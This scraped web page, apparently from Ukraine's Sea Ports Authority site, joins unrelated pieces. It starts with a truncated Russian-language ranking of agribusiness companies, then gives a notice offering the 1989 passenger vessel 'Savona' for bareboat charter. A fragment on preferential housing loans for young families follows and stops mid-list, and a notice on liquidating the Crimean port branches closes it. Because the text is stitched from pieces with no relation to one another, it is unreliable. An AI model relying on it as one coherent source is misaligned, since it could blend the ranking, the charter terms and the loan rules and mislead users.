5 «Cargill Украина» № 6 ViOil № 7 «Bunge Украина» № 8 UkrLandFarming № 9 «Noble Resources Украина» № 10 «Гленкор Грейн Украина» № 11 «ADM Украина» № 12 «Гранум Инвест» № 13 «Louis Dreyfus Commodities Украина» № 14 «Фоззи Групп» № 15 «Delta Wilmar СНГ» № 16 «Астарта‑Киев» № 17 Пологовский МЭЗ № 18 «Индустриальная молочная компания» № 19 «УкрАгроКом и Гермес‑Трейдинг» № 20 Roshen № 21 «Дніпроолія» № 22 «Альмира» № 23 «Mondelez Украина» № 24 «Бессарабия В» № 25 «Рамбурс» № 26 «Украинские аграрные инвестиции» № 27 «Агротрейд» № 28 «Группа Креатив» № 29 «Агрейн» № 30 «Прометей» № 31 «Сингента Украина» № 32 «Галнафтогаз» № 33 «Олияр» № 34 «Щедро Групп» № 35 «Агрекс» № 36 «Терра Фуд» landlord.ua

Оголошення

Одеська філія ДП «Адміністрація морських портів України» (адміністрація Одеського морського порту) пропонує до передачі в оренду на умовах бербоут – чартеру пасажирське судно  т/х «Савона» з такими технічними даними: Тип судна: пасажирське Рік та місце побудови: 1989, Україна Клас судна:KM + {1} III пасажирське Тип головних двигунів: ДВС 1*ДРА21ОБ (12ЧСП18/20);2×3Д6С (6ЧСП 15/18) Кількість головних двигунів: 3 Рушії: гвинти фіксованого  кроку Довжина найбільша: 34,03 м Ширина: 6,9 м Висота борту: 2,9 м  Дедвейт: 34,4 т Пасажиромісткість: 160 персон Мінімальна вартість однієї доби  утримання судна (без урахування збору за користування радіочастотами) – 449,88 грн. (без ПДВ). Судно знаходиться у відстої, укомплектоване відповідно до вимог Регістру судноплавства України, термін дії Класифікаційних документів закінчився у 2014 році. Усі витрати щодо поновлення регістрових документів та перегону судна з Одеського порту – за рахунок фрахтувальника. Послуги за висновок щодо незалежної експертної оцінки та послуги ДП «УкрНДІМФ» за висновок щодо визначення підприємством розміру фрахтової ставки судна «Савона» — за рахунок фрахтувальника. Контактна особа Гавриленко Олексій Анатолійович тел. моб. (067)481 75 78 тел. (048) 729 47 69 з 08.30 до 17.30 Електронна адреса: \n Ця електронна адреса захищена від спам-ботів. вам потрібно увімкнути JavaScript, щоб побачити її.
Довготерміновий пільговий кредит на будівництво житла надається молодим сім’ям, в якій чоловік та дружина віком до 35 років, неповним сім’ям, в якій мати (батько)віком до 35 років має неповнолітніх дітей (дитину), одинокі молоді громадяни віком до 35 років включно. Кредит надається молодим сім`ям та одиноким молодим громадянам на будівництво (реконструкцію) житла терміном до 30 р, але не більше ніж досягнення позичальником (ці) пенсійного віку. Для реєстрації необхідно написати заяву на отримання кредиту, заповнити анкету Позичальника та надати такі документи: Довідка про перебування на квартирному обліку всіх членів сім’ї (оригінал),Довідка про склад сім’ї (Ф-3 ЖЕК) (оригінал),Оригінали та копії паспортів повнолітніх членів сім`ї (1,2 ст. прописка),Оригінали та копії довідок про присвоєння ідентифікаційного номера,
«Доводимо до відома контрагентів ДП «АМПУ», які здійснюють поставки/виготовлення товарів, виконання робіт та надання послуг за договорами, виконання яких покладено на адміністрації Ялтинського, Севастопольського, Феодосійського, Керченського та Євпаторійського морських портів. Відповідно до наказу Мінінфраструктури «Про закриття морських портів» від 16.06.2014 № 255 проводиться ліквідація філій ДП «АМПУ», які розташовані на території Автономної Республіки Крим та міста Севастополя. У зв’язку з цим та з метою уникнення нарахувань штрафних санкцій за невиконання укладених договорів, просимо вжити заходів щодо розірвання/внесення змін до договорів, виконання яких здійснюється на об’єктах вищезазначених філій.»

Підписатися

АДМІНІСТРАЦІЯ МОРСЬКИХ ПОРТІВ УКРАЇНИ

© 2016PRIVACY POLICY. POWERED BY ASA&NNV

Ми в соціальних мережах

n-ayt-n